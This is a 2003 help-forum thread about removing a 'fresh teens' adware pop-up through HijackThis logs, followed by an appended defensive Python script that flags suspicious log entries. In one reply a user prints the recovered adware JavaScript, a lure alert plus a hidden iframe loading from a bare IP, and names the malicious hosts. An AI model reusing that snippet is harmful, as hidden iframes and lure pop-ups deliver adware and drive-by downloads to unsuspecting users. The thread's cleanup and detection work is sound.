new pop-up problem
Original Message
Name: sillygirl
Date: December 10, 2003 at 11:31:48 Pacific
Subject: new pop-up problem
OS: win 2000 NT
CPU/Ram: not sure

Comment: I've got a pop-up that runs when I open a new IE window (not consistently - maybe every 15th time) - a phony dialogue box type of pop-up. It reads "hey dude. click ok to see fresh teens". Nothing is taking care of this. I searched it, but the only forum I saw that specifically mentioned this was in Polish. Adaware, Spybot, CWSshredder - nothing touches it. Help would be appreciated.
Response Number 1
Name: capt
Date: December 10, 2003 at 11:45:04 Pacific
Subject: new pop-up problem

Reply: Have you disabled "Messenger" in the Control Panel? Under Administrative Tools > Services, scroll down to Messenger, right click, select Properties and select Disable instead of Automatic. This service has nothing to do with MSN Messenger, and is not needed by any average user. If it does not work you will need to try "hijackthis" from http://www.lukhere.com and post the log at that website's nasties forum or back here. If you post the log here, be sure to state that you used Spybot and Adaware and they did not work.
Response Number 2
Name: capt
Date: December 10, 2003 at 11:48:33 Pacific
Subject: new pop-up problem

Reply: My review and proof skills are the pits: "lurkhere" is the website you are looking for, and "hijackthis" is found under "nice files".
Response Number 3
Name: sillygirl
Date: December 10, 2003 at 13:03:26 Pacific
Subject: new pop-up problem
Reply: Here is my hijackthis log. I went to lukhere, but didn't see any forums, or downloads for that matter. If anyone can help out, I'd appreciate it.

Logfile of HijackThis v1.97.7
Scan saved at 4:03:12 PM, on 12/10/2003
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
D:\WINNT\System32\smss.exe
D:\WINNT\system32\winlogon.exe
D:\WINNT\system32\services.exe
D:\WINNT\system32\lsass.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\system32\spoolsv.exe
D:\Program Files\NavNT\defwatch.exe
D:\WINNT\System32\svchost.exe
D:\WINNT\system32\cba\pds.exe
D:\Program Files\SSC\NSCTOP.EXE
D:\WINNT\system32\regsvc.exe
D:\WINNT\system32\MSTask.exe
D:\WINNT\System32\tcpsvcs.exe
D:\WINNT\System32\WBEM\WinMgmt.exe
D:\Program Files\ORL\VNC\WinVNC.exe
D:\WINNT\System32\mspmspsv.exe
D:\WINNT\system32\ams_ii\hndlrsvc.exe
D:\WINNT\system32\MsgSys.EXE
D:\WINNT\system32\ams_ii\iao.exe
D:\WINNT\system32\cba\xfr.exe
D:\WINNT\Explorer.exe
D:\Program Files\SVA Player\SVAPLAYER.EXE
D:\WINNT\loadqm.exe
D:\Program Files\Common Files\Real\Update_OB\realsched.exe
D:\Program Files\WinZip\WZQKPICK.EXE
D:\Program Files\Microsoft Office\Office\OUTLOOK.EXE
D:\Program Files\Common Files\System\MAPI\1033\nt\MAPISP32.EXE
D:\Program Files\Autodesk Architectural Desktop 3\acad.exe
D:\Program Files\Autodesk Architectural Desktop 3\acad.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\MSN Messenger\msnmsgr.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\Adobe\Acrobat 5.0\Reader\AcroRd32.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\WINNT\System32\taskmgr.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\PROGRA~1\WINZIP\winzip32.exe
D:\Documents and Settings\paul\Local Settings\Temp\HijackThis.exe

O1 - Hosts: 203.161.127.141 www.dcsresearch.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {f760cb9e-c60f-4a89-890e-fae8b849493e} - D:\WINNT\madise.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [WinVNC] "D:\Program Files\ORL\VNC\WinVNC.exe" -servicehelper
O4 - HKLM\..\Run: [SVAPlayer] D:\Program Files\SVA Player\SVAPLAYER.EXE
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Ad-aware] "D:\Program Files\Lavasoft\Ad-aware 6\Ad-aware.exe" +c
O4 - HKLM\..\Run: [TkBellExe] "D:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [WinampAgent] "D:\Program Files\Winamp\Winampa.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = D:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WinZip Quick Pick.lnk = D:\Program Files\WinZip\WZQKPICK.EXE
O12 - Plugin for .bcf: D:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: D:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/20791ddcd289ffe24b19/netzip/RdxIE601.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37943.4360648148
O16 - DPF: {A3009861-330C-4E10-822B-39D16EC8829D} (CRAVOnline Object) - http://www.ravantivirus.com/scan/ravonline.cab
O16 - DPF: {CA034DCC-A580-4333-B52F-15F98C42E04C} (Downloader Class) - https://www.stopzilla.com/_download/Auto_Installer/dwnldr.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://active.macromedia.com/flash2/cabs/swflash.cab
O16 - DPF: {f760cb9e-c60f-4a89-890e-fae8b849493e} (IRDIXAObj Class) -
O17 - HKLM\System\CCS\Services\Tcpip\..\{DECD798C-A65B-4ACC-BBB8-F0941B6F2BA5}: NameServer = 216.211.192.2,216.211.192.6
Response Number 4
Name: ER4S3R
Date: December 10, 2003 at 16:00:58 Pacific
Subject: new pop-up problem

Reply: Have a look at the link below; it offers freeware pop-up blockers. For most internet users, getting a pop-up stopper is a MUST. Others prefer to turn this function on from their web browsers or firewall.

Freeware pop-up Stoppers

ER4S3R
Response Number 5
Name: Abnormal
Date: December 10, 2003 at 22:07:54 Pacific
Subject: new pop-up problem

Reply: Hi Silly, run HijackThis again, checkmark the box next to the lines below, click "Fix checked" and restart your computer.

O1 - Hosts: 203.161.127.141 www.dcsresearch.com
O2 - BHO: (no name) - {f760cb9e-c60f-4a89-890e-fae8b849493e} - D:\WINNT\madise.dll
O4 - HKLM\..\Run: [TkBellExe] "D:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/20791ddcd289ffe24b19/netzip/RdxIE601.cab
O16 - DPF: {f760cb9e-c60f-4a89-890e-fae8b849493e} (IRDIXAObj Class) -

After restarting, go to "My Computer", "Local Disk [C]", the WINNT folder, and find and delete madise.dll (right click the file, then choose "delete"). Post another log.
Response Number 6
Name: sillygirl
Date: December 11, 2003 at 11:22:55 Pacific
Subject: new pop-up problem
Reply: abnormal: I did what you suggested. Due to the randomness of the pop-ups, it'll be hard to tell if it's fixed just from the pop-ups themselves, but here is the hijackthis log, post fix. See whatcha think:

Logfile of HijackThis v1.97.7
Scan saved at 2:21:18 PM, on 12/11/2003
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
D:\WINNT\System32\smss.exe
D:\WINNT\system32\winlogon.exe
D:\WINNT\system32\services.exe
D:\WINNT\system32\lsass.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\system32\spoolsv.exe
D:\Program Files\NavNT\defwatch.exe
D:\WINNT\System32\svchost.exe
D:\WINNT\system32\cba\pds.exe
D:\Program Files\SSC\NSCTOP.EXE
D:\WINNT\system32\regsvc.exe
D:\WINNT\system32\MSTask.exe
D:\WINNT\System32\tcpsvcs.exe
D:\WINNT\System32\WBEM\WinMgmt.exe
D:\WINNT\System32\mspmspsv.exe
D:\WINNT\system32\ams_ii\hndlrsvc.exe
D:\WINNT\system32\MsgSys.EXE
D:\WINNT\system32\ams_ii\iao.exe
D:\WINNT\system32\cba\xfr.exe
D:\WINNT\Explorer.exe
D:\Program Files\SVA Player\SVAPLAYER.EXE
D:\WINNT\loadqm.exe
D:\Program Files\WinZip\WZQKPICK.EXE
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\PROGRA~1\WINZIP\winzip32.exe
D:\Documents and Settings\paul\Local Settings\Temp\HijackThis.exe

O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [WinVNC] "D:\Program Files\ORL\VNC\WinVNC.exe" -servicehelper
O4 - HKLM\..\Run: [SVAPlayer] D:\Program Files\SVA Player\SVAPLAYER.EXE
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Ad-aware] "D:\Program Files\Lavasoft\Ad-aware 6\Ad-aware.exe" +c
O4 - HKLM\..\Run: [WinampAgent] "D:\Program Files\Winamp\Winampa.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = D:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WinZip Quick Pick.lnk = D:\Program Files\WinZip\WZQKPICK.EXE
O12 - Plugin for .bcf: D:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: D:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37943.4360648148
O16 - DPF: {A3009861-330C-4E10-822B-39D16EC8829D} (CRAVOnline Object) - http://www.ravantivirus.com/scan/ravonline.cab
O16 - DPF: {CA034DCC-A580-4333-B52F-15F98C42E04C} (Downloader Class) - https://www.stopzilla.com/_download/Auto_Installer/dwnldr.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://active.macromedia.com/flash2/cabs/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{DECD798C-A65B-4ACC-BBB8-F0941B6F2BA5}: NameServer = 216.211.192.2,216.211.192.6
Response Number 7
Name: Abnormal
Date: December 11, 2003 at 15:59:39 Pacific
Subject: new pop-up problem

Reply: Hi again Silly, you look ok to me. One more thing, you don't need this:

O4 - HKLM\..\Run: [LoadQM] loadqm.exe

Removing that line should do it.

LoadQM.exe (Microsoft): This task loads the MSN Queue Manager and is installed when you install MSN Explorer or MSN Messenger. LOADQM gobbles up system resources and appears on most end-users’ Task Lists who come to us complaining of low System & User Resources or very slow, "crawling", PCs. In January 2003 this is still one of the worst behaved Microsoft programs! Recommendation: Disable immediately, or Delete using Starter. Next, reboot your PC and find LOADQM in the C:\WINDOWS folder. Rename it to LOADQM.EXE.OLD, as if you do not it will otherwise get put back in your Task List at some stage or other (on some PCs you may need to boot into Safe Mode before you are able to rename LOADQM). Note: LOADQM gets re-installed every time you install a new version of Microsoft’s MSN Messenger.

Here are some tips I put together, to help you stay clean: Hijack prevention tips

Take care because we care
Abnormal
Response Number 9
Name: Pb
Date: December 15, 2003 at 03:36:52 Pacific
Subject: new pop-up problem
Reply: I had that virus. HijackThis, Spywareblaster, deleting cookies, cache & temporary files, wiping free space, all: DID NOT FIX IT. There's no mention of it on Symantec or Microsoft sites. I had used "Disk Investigator" to scan the raw data on my hard drive and I found this JavaScript:

<HTML>
<HEAD>
<SCRIPT language="JavaScript">
window.open('min.html', 'smth' + parseInt(Math.random() * 1000000), 'directories=0,toolbar=0,menubar=0,personalbar=0,location=0,scrollbars=0,status=0,resizable=1,height=0,width=0,screenX=0,screenY=0,left=0,top=0');
alert('Hey dude. Click OK to see fresh teens');
</SCRIPT>
</HEAD>
<BODY>
<iframe src="http://66.230.151.114/dxp/da.html" width=0 height=0></iframe>
</BODY>
</HTML>

BUT it is not part of a real file, i.e. this virus must write this, run it, and then delete it faster than you can click. You can see the Math.random * 1000000... I've seen both 66.230.151.114 and 66.230.134.150. I did a trace and found out that the perpetrator of this virus is hosted at www.isprime.com. The perpetrator of this virus belongs in jail. To get rid of it I had to go to www.microsoft.com/downloads and entirely re-install Internet Explorer 6. Hope that helps.
Response Number 10
Name: bewles
Date: January 10, 2004 at 07:44:06 Pacific
Subject: new pop-up problem
Reply: I caught the same virus. I followed all of the instructions given by Abnormal and I think that my problem is gone. However, I keep having one tiny problem with Internet Explorer. Every time that I open up the web, my home page is www.search-space.com. I've tried to change it numerous times but it doesn't work. This problem arose when I started getting the annoying pop-up problem/virus earlier. Does anyone have any suggestions? Here is my HijackThis log:

Logfile of HijackThis v1.97.7
Scan saved at 10:36:54 AM, on 1/10/2004
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v5.50 (5.50.4134.0600)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\PROGRAM FILES\WEBSVR\SYSTEM\INETSW95.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\DELL\ACCESSDIRECT\DADAPP.EXE
C:\PROGRAM FILES\DELL\ACCESSDIRECT\DADTRAY.EXE
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPLPR.EXE
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPENH.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\PROGRAM FILES\LOGITECH\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\OSA.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\WORKS SHARED\WKCALREM.EXE
C:\PROGRAM FILES\LINKSYS\WIRELESS-B NOTEBOOK ADAPTER\WPC11CFG.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\TEMP\TD_0006.DIR\HIJACKTHIS.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.dell.com/search/index.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search-space.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dellnet.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: Zero Popup - {2EF37A01-884F-11d5-AC99-B112050ECB4F} - C:\PROGRA~1\ZEROPO~1\ZERO-P~1.DLL
O3 - Toolbar: @msdxmLC.dll,-1@1033,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [DadApp] C:\Program Files\DELL\AccessDirect\dadapp.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe
O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [Microsoft WebServer] C:\Program Files\WebSvr\System\svctrl /init
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [SSDPSRV] C:\WINDOWS\SYSTEM\ssdpsrv.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [Microsoft WebServer] C:\Program Files\WebSvr\System\inetsw95 -w3svc
O4 - HKCU\..\Run: [winlogon] c:\windows\winlogon.exe
O4 - HKCU\..\Run: [QuickTime Task] c:\windows\qttasks.exe
O4 - HKCU\..\Run: [MoneyAgent] "C:\Program Files\Microsoft Money\System\Money Express.exe"
O4 - Startup: Office Startup.lnk = C:\Program Files\Microsoft Office\Office\OSA.EXE
O4 - Startup: Microsoft Works Calendar Reminders.lnk = C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
O4 - Startup: Wireless-B Notebook Adapter Utility.lnk = C:\Program Files\Linksys\Wireless-B Notebook Adapter\WPC11Cfg.exe
O8 - Extra context menu item: &Define - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_DEF.HTM
O8 - Extra context menu item: Look Up in &Encyclopedia - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_ENC.HTM
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O9 - Extra button: Encarta Encyclopedia (HKLM)
O9 - Extra 'Tools' menuitem: Encarta Encyclopedia (HKLM)
O9 - Extra button: Define (HKLM)
O9 - Extra 'Tools' menuitem: Define (HKLM)
O9 - Extra button: Dell Home (HKCU)
O14 - IERESET.INF: START_PAGE_URL=http://www.dellnet.com

Any suggestions would be very helpful. Thanks a lot!
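A defender-side triage of the HijackThis entry types that the helpers in this thread singled out (the O1/O2/O16 lines Abnormal told sillygirl to fix, and the R0/R1 start-page entries in bewles's log), as an added example that is not part of the original thread or of HijackThis itself. The sample log is constructed from lines posted above, the rules are heuristics modelled on what was flagged here, and the `trusted_hosts` allowlist, `parse` and `triage` are this example's own names.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: entries copied from the HijackThis logs in this thread, one per line.
SAMPLE_LOG = r"""
O1 - Hosts: 203.161.127.141 www.dcsresearch.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {f760cb9e-c60f-4a89-890e-fae8b849493e} - D:\WINNT\madise.dll
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/20791ddcd289ffe24b19/netzip/RdxIE601.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://active.macromedia.com/flash2/cabs/swflash.cab
O16 - DPF: {f760cb9e-c60f-4a89-890e-fae8b849493e} (IRDIXAObj Class) -
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search-space.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchdot.net
"""

ENTRY = re.compile(r"^(?P<kind>[OR]\d+) - (?P<body>.*)$")   # "O16 - DPF: ..."
CLSID = re.compile(r"\{[0-9A-Fa-f-]{36}\}")
DPF = re.compile(r"^DPF: (\{[^}]+\}) \(([^)]*)\) -\s*(\S*)")   # clsid, name, url
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse(log):
    """(section, body) pairs for the O/R entry lines of a HijackThis log; other lines are ignored."""
    return [(m["kind"], m["body"].strip()) for m in
            (ENTRY.match(l.strip()) for l in log.splitlines()) if m]

def triage(log, trusted_hosts=()):
    """Return [(section, reason)] for entries worth a closer look (heuristics, not signatures)."""
    entries = parse(log)
    # CLSIDs of downloaded (O16) controls that no longer record where they came from.
    orphans = {m.group(1).lower() for k, b in entries
               if k == "O16" and (m := DPF.match(b)) and not m.group(3)}
    findings = []
    for kind, body in entries:
        reason = None
        if kind == "O1":   # hosts-file override: every request for that name goes to a fixed IP
            reason = "hosts file redirects a public domain to a fixed IP"
        elif kind == "O2":
            c = CLSID.search(body)
            if c and c.group(0).lower() in orphans:
                reason = "BHO shares its CLSID with an O16 control that has no source URL"
            elif "(no name)" in body and "program files" not in body.lower():
                reason = "unnamed BHO loaded from outside Program Files"
        elif kind == "O16":
            m = DPF.match(body)
            url = m.group(3) if m else ""
            if not url:
                reason = "ActiveX control with no source URL"
            elif IPV4.match(urlsplit(url).hostname or ""):
                reason = "ActiveX control downloaded from a bare IP address"
        elif kind in ("R0", "R1"):   # start/search page settings: compare against an allowlist
            host = urlsplit(body.rsplit(" = ", 1)[-1]).hostname or ""
            if host and host not in trusted_hosts:
                reason = "browser start/search page points at an unexpected host"
        if reason: findings.append((kind, reason))
    return findings
```

Running `triage(SAMPLE_LOG, trusted_hosts={"www.dell.com"})` flags exactly the O1, O2 (madise.dll), both suspect O16 lines and the two R lines, and leaves the Acrobat BHO and the Macromedia control alone.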